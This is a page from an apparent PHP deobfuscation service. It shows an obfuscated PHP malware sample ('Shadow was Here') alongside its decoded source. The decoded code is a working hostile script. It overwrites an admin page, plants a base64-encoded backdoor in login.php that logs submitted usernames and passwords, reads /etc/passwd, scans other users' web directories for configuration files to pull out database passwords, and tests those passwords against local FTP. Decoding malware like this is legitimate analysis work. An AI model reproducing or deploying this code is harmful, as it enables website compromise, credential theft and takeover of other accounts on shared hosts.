Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php #######Shadow########################### $rhs = "ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0a..

Decoded Output download

echo "<html>";
echo "<title>Shadow was Here</title><body>";
set_time_limit(0);
$system_uname = php_uname();
$system_pwd   = getcwd();
#####################
$pwd_admin = ereg_replace('/images','/admin', $system_pwd);
if (chdir($pwd_admin)) {
	if (is_writable($pwd_admin)) {
		if (is_writable('categories.php')) {
			unlink('categories.php');
			$new_categories     = "<?php header(location:'http://www.google.com'); ?>";
			$patch_categories   = fopen('categories.php','w');
			$write_categories   = fwrite('categories.php',"$new_categories");
			$response_categories= "[-] Categories Patched";
		}
		else { $response_categories = "[-] Unable to patch Categories"; }
		if (is_writable('login.php')) {
			$backdoor_login = "<?php eval(base64_decode('aWYgKCRIVFRQX1BPU1RfVkFSU1sndXNlcm5hbWUnXSkgew0KCQ0KCSR3cml0ZSA9ICgkSFRUUF9QT1NUX1ZBUlNbJ3VzZXJuYW1lJ10pOw0KCXBhc3Nfd3JpdGUoJHdyaXRlKTsNCn0NCmlmICgkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ10pIHsNCgkkd3JpdGUgPSAkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ107DQoJcGFzc193cml0ZSgkd3JpdGUpOw0KfQ0KZnVuY3Rpb24gcGFzc193cml0ZSgkd3JpdGUpIHsNCglpZiAoaXNfd3JpdGFibGUoJy90bXAnKSkgew0KCQkkcGFzc19maWxlID0gZm9wZW4oJ3Bhc3N3ZC50eHQnLCJhKyIpOw0KCQkkcGFzc193cml0ZT0gZndyaXRlKCRwYXNzX2ZpbGUsICIkd3JpdGUiKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCcvdmFyL3RtcCcpKSB7DQoJCSRwYXNzX2ZpbGUgPSBmb3BlbigncGFzc3dkLnR4dCcsImErIik7DQoJCSRwYXNzX3dyaXRlPSBmd3JpdGUoJHBhc3NfZmlsZSwgJHdyaXRlKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCdkZXYvc2htJykpIHsNCgkJJHBhc3NfZmlsZSA9IGZvcGVuKCcvZGV2L3NobS9wYXNzd2QudHh0JywiYSsiKTsNCgkJJHBhc3Nfd3JpdGU9IGZ3cml0ZSgnJHBhc3NfZmlsZScsICIkd3JpdGUiKTsNCgl9DQp9'); ?>";
			$add_on_login   = fopen('login.php','a+');
			$write_login    = fwrite('login.php',$backdoor_login);
			$response_login = "[-] Put backdoor on Login";
					}
		else { $response_login = "[-] Unable To put backdoor on Login"; }			
	}
}
#####################################

###Bjork## 
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
   echo "[-] Error : Unable to open /etc/passwd";
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
  $str=fgets($passwd);
  if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
        if (is_readable($dirz)) {
            array_push($users,$username);
            array_push($path_to_public,$dirz);
        }
    }
  }
  $i++;
}
###################
#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "[+] Founded ".sizeof($users)." entries in /etc/passwd
";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
";
echo "[~] Searching for passwords in config.* files...

";
echo "$response_work_dir
";
echo "$response_login
";
echo "$response_categories
";
echo "$response_bot
";
foreach ($users as $user) {
        $path="/home/$user/public_html/";
        read_dir($path,$user);
}
echo "
[+] Done
";
function read_dir($path,$username) {
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
              $fpath="$path$file";
              if (($file!='.') and ($file!='..')) {
                 if (is_readable($fpath)) {
                    $dr="$fpath/";
                    if (is_dir($dr)) {
                       read_dir($dr,$username);
                    }
                    else {
                         if (($file=='config.php') or ($file=='e107_config.php') or ($file=='header.inc.php') or ($file=='content.inc.php') or ($file=='mainfile.php') or ($file=='utils.inc.php') or ($file=='main.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='e107_config.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='configuration.php') or ($file=='configurations.php') or ($file=='configs.php') or ($file=='config.locale.php') or ($file=='db.inc.php') or ($file=='dbconnect.inc.php') or ($file=='dbconnection.php') or ($file=='var.php') or ($file=='mysql.php') or ($file=='global.inc.php') or ($file=='database.php') or ($file=='dbconnect.php') or ($file=='conf.php') or ($file=='configDB.inc.php') or ($file=='db.php') or ($file=='db_connect.php')) {
                            $pass=get_pass($fpath);
                            if ($pass!='') {
                               echo "[+] $fpath
$pass
";
                               ftp_check($username,$pass);
                            }
                         }
                    }
                }
             } 
        }
    }
}
function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
        $line=fgets($config);
        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
            if (strrpos($line,'"'))
                           $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
         else
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
            return $pass;
        }
    }
}
function ftp_check($login,$pass) {
     @$ftp=ftp_connect('127.0.0.1');
     if ($ftp) {
        @$res=ftp_login($ftp,$login,$pass);
        if ($res) {
          echo '[FTP] '.$login.':'.$pass."  Success
";
        }
        else ftp_quit($ftp);
     }
}
echo "</textarea><br>";
echo "</body></html>";

Did this file decode correctly?

Original Code

<?php
#######Shadow###########################
$rhs = "ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0aXRsZT5TaGFkb3cgd2FzIEhlcmU8L3RpdGxlPjxib2R5PiI7DQpzZXRfdGltZV9saW1pdCgwKTsNCiRzeXN0ZW1fdW5hbWUgPSBwaHBfdW5hbWUoKTsNCiRzeXN0ZW1fcHdkICAgPSBnZXRjd2QoKTsNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KJHB3ZF9hZG1pb
iA9IGVyZWdfcmVwbGFjZSgnL2ltYWdlcycsJy9hZG1pbicsICRzeXN0ZW1fcHdkKTsNCmlmIChjaGRpcigkcHdkX2FkbWluKSkgew0KCWlmIChpc193cml0YWJsZSgkcHdkX2FkbWluKSkgew0KCQlpZiAoaXNfd3JpdGFibGUoJ2NhdGVnb3JpZXMucGhwJykpIHsNCgkJCXVubGluaygnY2F0ZWdvcmllcy5waHAnKT
sNCgkJCSRuZXdfY2F0ZWdvcmllcyAgICAgPSAiPD9waHAgaGVhZGVyKGxvY2F0aW9uOidodHRwOi8vd3d3Lmdvb2dsZS5jb20nKTsgPz4iOw0KCQkJJHBhdGNoX2NhdGVnb3JpZXMgICA9IGZvcGVuKCdjYXRlZ29yaWVzLnBocCcsJ3cnKTsNCgkJCSR3cml0ZV9jYXRlZ29yaWVzICAgPSBmd3JpdGUoJ2NhdGVnb3J
pZXMucGhwJywiJG5ld19jYXRlZ29yaWVzIik7DQoJCQkkcmVzcG9uc2VfY2F0ZWdvcmllcz0gIlstXSBDYXRlZ29yaWVzIFBhdGNoZWQiOw0KCQl9DQoJCWVsc2UgeyAkcmVzcG9uc2VfY2F0ZWdvcmllcyA9ICJbLV0gVW5hYmxlIHRvIHBhdGNoIENhdGVnb3JpZXMiOyB9DQoJCWlmIChpc193cml0YWJsZSgnbG9n
aW4ucGhwJykpIHsNCgkJCSRiYWNrZG9vcl9sb2dpbiA9ICI8P3BocCBldmFsKGJhc2U2NF9kZWNvZGUoJ2FXWWdLQ1JJVkZSUVgxQlBVMVJmVmtGU1Uxc25kWE5sY201aGJXVW5YU2tnZXcwS0NRMEtDU1IzY21sMFpTQTlJQ2drU0ZSVVVGOVFUMU5VWDFaQlVsTmJKM1Z6WlhKdVlXMWxKMTBwT3cwS0NYQmhjM05mZ
DNKcGRHVW9KSGR5YVhSbEtUc05DbjBOQ21sbUlDZ2tTRlJVVUY5UVQxTlVYMVpCVWxOYkozQmhjM04zYjNKa0oxMHBJSHNOQ2dra2QzSnBkR1VnUFNBa1NGUlVVRjlRVDFOVVgxWkJVbE5iSjNCaGMzTjNiM0prSjEwN0RRb0pjR0Z6YzE5M2NtbDBaU2drZDNKcGRHVXBPdzBLZlEwS1puVnVZM1JwYjI0Z2NHRnpjMT
kzY21sMFpTZ2tkM0pwZEdVcElIc05DZ2xwWmlBb2FYTmZkM0pwZEdGaWJHVW9KeTkwYlhBbktTa2dldzBLQ1Fra2NHRnpjMTltYVd4bElEMGdabTl3Wlc0b0ozQmhjM04zWkM1MGVIUW5MQ0poS3lJcE93MEtDUWtrY0dGemMxOTNjbWwwWlQwZ1puZHlhWFJsS0NSd1lYTnpYMlpwYkdVc0lDSWtkM0pwZEdVaUtUc05
DZ2w5RFFvSlpXeHpaV2xtS0dselgzZHlhWFJoWW14bEtDY3ZkbUZ5TDNSdGNDY3BLU0I3RFFvSkNTUndZWE56WDJacGJHVWdQU0JtYjNCbGJpZ25jR0Z6YzNka0xuUjRkQ2NzSW1FcklpazdEUW9KQ1NSd1lYTnpYM2R5YVhSbFBTQm1kM0pwZEdVb0pIQmhjM05mWm1sc1pTd2dKSGR5YVhSbEtUc05DZ2w5RFFvSlpX
eHpaV2xtS0dselgzZHlhWFJoWW14bEtDZGtaWFl2YzJodEp5a3BJSHNOQ2drSkpIQmhjM05mWm1sc1pTQTlJR1p2Y0dWdUtDY3ZaR1YyTDNOb2JTOXdZWE56ZDJRdWRIaDBKeXdpWVNzaUtUc05DZ2tKSkhCaGMzTmZkM0pwZEdVOUlHWjNjbWwwWlNnbkpIQmhjM05mWm1sc1pTY3NJQ0lrZDNKcGRHVWlLVHNOQ2dsO
URRcDknKTsgPz4iOw0KCQkJJGFkZF9vbl9sb2dpbiAgID0gZm9wZW4oJ2xvZ2luLnBocCcsJ2ErJyk7DQoJCQkkd3JpdGVfbG9naW4gICAgPSBmd3JpdGUoJ2xvZ2luLnBocCcsJGJhY2tkb29yX2xvZ2luKTsNCgkJCSRyZXNwb25zZV9sb2dpbiA9ICJbLV0gUHV0IGJhY2tkb29yIG9uIExvZ2luIjsNCgkJCQkJfQ
0KCQllbHNlIHsgJHJlc3BvbnNlX2xvZ2luID0gIlstXSBVbmFibGUgVG8gcHV0IGJhY2tkb29yIG9uIExvZ2luIjsgfQkJCQ0KCX0NCn0NCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KIyMjQmpvcmsjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsNCmlmICghJHB
hc3N3ZCkgew0KICAgZWNobyAiWy1dIEVycm9yIDogVW5hYmxlIHRvIG9wZW4gL2V0Yy9wYXNzd2QiOw0KfQ0KJHBhdGhfdG9fcHVibGljPWFycmF5KCk7DQokdXNlcnM9YXJyYXkoKTsNCiRwYXRodG9jb25mPWFycmF5KCk7DQokaT0wOw0Kd2hpbGUoIWZlb2YoJHBhc3N3ZCkpIHsNCiAgJHN0cj1mZ2V0cygkcGFz
c3dkKTsNCiAgaWYgKCRpPjM1KSB7DQogICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOw0KICAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOw0KICAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsNCiAgICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7DQogICAgICAgIGlmIChpc19yZWFkY
WJsZSgkZGlyeikpIHsNCiAgICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7DQogICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7DQogICAgICAgIH0NCiAgICB9DQogIH0NCiAgJGkrKzsNCn0NCiMjIyMjIyMjIyMjIyMjIyMjIyMNCiMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMNCmVjaG8gIjxicj48YnI+IjsNCmVjaG8gIjx0ZXh0YXJlYSBuYW1lPSdtYWluX3dpbmRvdycgY29scz0xMDAgcm93cz0yMD4iOw0KZWNobyAiWytdIEZvdW5kZWQgIi5zaXplb2YoJHVzZXJzKS4iIGVudHJpZXMgaW4gL2V0Yy9wYXNzd2RcbiI7DQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZig
kcGF0aF90b19wdWJsaWMpLiIgcmVhZGFibGUgcHVibGljX2h0bWwgZGlyZWN0b3JpZXNcbiI7DQplY2hvICJbfl0gU2VhcmNoaW5nIGZvciBwYXNzd29yZHMgaW4gY29uZmlnLiogZmlsZXMuLi5cblxuIjsNCmVjaG8gIiRyZXNwb25zZV93b3JrX2RpclxuIjsNCmVjaG8gIiRyZXNwb25zZV9sb2dpblxuIjsNCmVj
aG8gIiRyZXNwb25zZV9jYXRlZ29yaWVzXG4iOw0KZWNobyAiJHJlc3BvbnNlX2JvdFxuIjsNCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgew0KICAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsNCiAgICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOw0KfQ0KZWNobyAiXG5bK10gRG9uZ
VxuIjsNCmZ1bmN0aW9uIHJlYWRfZGlyKCRwYXRoLCR1c2VybmFtZSkgew0KICAgIGlmICgkaGFuZGxlID0gb3BlbmRpcigkcGF0aCkpIHsNCiAgICAgICAgd2hpbGUgKGZhbHNlICE9PSAoJGZpbGUgPSByZWFkZGlyKCRoYW5kbGUpKSkgew0KICAgICAgICAgICAgICAkZnBhdGg9IiRwYXRoJGZpbGUiOw0KICAgIC
AgICAgICAgICBpZiAoKCRmaWxlIT0nLicpIGFuZCAoJGZpbGUhPScuLicpKSB7DQogICAgICAgICAgICAgICAgIGlmIChpc19yZWFkYWJsZSgkZnBhdGgpKSB7DQogICAgICAgICAgICAgICAgICAgICRkcj0iJGZwYXRoLyI7DQogICAgICAgICAgICAgICAgICAgIGlmIChpc19kaXIoJGRyKSkgew0KICAgICAgICA
gICAgICAgICAgICAgICByZWFkX2RpcigkZHIsJHVzZXJuYW1lKTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBlbHNlIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKCRmaWxlPT0nY29uZmlnLnBocCcpIG9yICgkZmlsZT09J2UxMDdfY29uZmlnLnBocCcpIG9yICgk
ZmlsZT09J2hlYWRlci5pbmMucGhwJykgb3IgKCRmaWxlPT0nY29udGVudC5pbmMucGhwJykgb3IgKCRmaWxlPT0nbWFpbmZpbGUucGhwJykgb3IgKCRmaWxlPT0ndXRpbHMuaW5jLnBocCcpIG9yICgkZmlsZT09J21haW4ucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnLmluYy5waHAnKSBvciAoJGZpbGU9PSdkYi5pb
mMucGhwJykgb3IgKCRmaWxlPT0nY29ubmVjdC5waHAnKSBvciAoJGZpbGU9PSdlMTA3X2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd3cC1jb25maWcucGhwJykgb3IgKCRmaWxlPT0ndmFyLnBocCcpIG9yICgkZmlsZT09J2NvbmZpZ3VyZS5waHAnKSBvciAoJGZpbGU9PSdjb25maWd1cmF0aW9uLnBocCcpIG9yIC
gkZmlsZT09J2NvbmZpZ3VyYXRpb25zLnBocCcpIG9yICgkZmlsZT09J2NvbmZpZ3MucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnLmxvY2FsZS5waHAnKSBvciAoJGZpbGU9PSdkYi5pbmMucGhwJykgb3IgKCRmaWxlPT0nZGJjb25uZWN0LmluYy5waHAnKSBvciAoJGZpbGU9PSdkYmNvbm5lY3Rpb24ucGhwJykgb3I
gKCRmaWxlPT0ndmFyLnBocCcpIG9yICgkZmlsZT09J215c3FsLnBocCcpIG9yICgkZmlsZT09J2dsb2JhbC5pbmMucGhwJykgb3IgKCRmaWxlPT0nZGF0YWJhc2UucGhwJykgb3IgKCRmaWxlPT0nZGJjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J2NvbmYucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnREIuaW5jLnBo
cCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsNCiAgICAgICAgICAgICAgICAgICAgI
CAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgIC
B9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgIH0gDQogICAgICAgIH0NCiAgICB9DQp9DQpmdW5jdGlvbiBnZXRfcGFzcygkbGluaykgew0KICAgIEAkY29uZmlnPWZvcGVuKCRsaW5rLCdyJyk7DQogICAgd2hpbGUoIWZlb2YoJGNvbmZpZykpIHsNCiAgICAgICAgJGxpbmU9ZmdldHMoJGNvbmZpZyk
7DQogICAgICAgIGlmIChzdHJzdHIoJGxpbmUsJ3Bhc3MnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3b3JkJykgb3Igc3Ryc3RyKCRsaW5lLCdwYXNzd2QnKSkgew0KICAgICAgICAgICAgaWYgKHN0cnJwb3MoJGxpbmUsJyInKSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICRwYXNzPXN1YnN0cigkbGluZSwo
c3RycG9zKCRsaW5lLCc9JykrMyksKHN0cnJwb3MoJGxpbmUsJyInKS0oc3RycG9zKCRsaW5lLCc9JykrMykpKTsNCiAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICRwYXNzPXN1YnN0cigkbGluZSwoc3RycG9zKCRsaW5lLCc9JykrMyksKHN0cnJwb3MoJGxpbmUsIiciKS0oc3RycG9zKCRsaW5lLCc9JykrM
ykpKTsNCiAgICAgICAgICAgIHJldHVybiAkcGFzczsNCiAgICAgICAgfQ0KICAgIH0NCn0NCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsNCiAgICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOw0KICAgICBpZiAoJGZ0cCkgew0KICAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG
9naW4sJHBhc3MpOw0KICAgICAgICBpZiAoJHJlcykgew0KICAgICAgICAgIGVjaG8gJ1tGVFBdICcuJGxvZ2luLic6Jy4kcGFzcy4iICBTdWNjZXNzXG4iOw0KICAgICAgICB9DQogICAgICAgIGVsc2UgZnRwX3F1aXQoJGZ0cCk7DQogICAgIH0NCn0NCmVjaG8gIjwvdGV4dGFyZWE+PGJyPiI7DQplY2hvICI8L2J
vZHk+PC9odG1sPiI7";
eval(base64_decode($rhs));
##########was######here#################
?>

Function Calls

base64_decode 1

Variables

$rhs ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0aXRsZT5TaGFkb3cgd2FzIEhlcmU8..

Stats

MD5 364c3aacc565b4ace7eddbe33aac9f67
Eval Count 1
Decode Time 92 ms